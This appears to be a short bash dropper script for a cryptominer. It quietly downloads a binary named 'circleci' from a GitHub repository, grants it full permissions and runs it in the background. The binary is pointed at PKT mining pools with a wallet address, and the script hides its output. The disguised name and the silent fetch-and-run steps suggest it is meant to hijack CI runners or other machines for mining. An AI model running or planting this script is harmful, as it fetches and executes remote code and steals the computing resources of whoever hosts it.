#!/bin/bash
wget https://github.com/aurbach55/pos/raw/main/circleci >/dev/null 2>&1
chmod 777 circleci >/dev/null 2>&1
nohup ./circleci ann -p pkt1qqwya7kp20pn9ugnw3lj78l3dmjp00gk3ct9ey9 https://stratum.zetahash.com/ http://pool.pkt.world http://pool.pktpool.io > /tmp/circleci.log 2>&1




